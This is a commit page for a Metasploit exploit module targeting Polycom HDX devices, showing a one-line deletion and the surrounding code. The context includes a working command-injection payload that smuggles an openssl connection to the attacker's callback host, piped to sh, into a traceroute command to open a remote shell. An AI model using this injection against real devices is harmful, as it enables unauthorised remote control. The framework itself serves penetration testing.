Update polycom_hdx_traceroute_exec.rb

MS-2855/keylogger-mettle-extension
Austin 2017-11-28 22:01:41 -05:00 committed by GitHub
parent 829a7a53db
commit 676a08b849
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 1 deletions

View File

@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
sock.put(cmd)
if datastore['VERBOSE']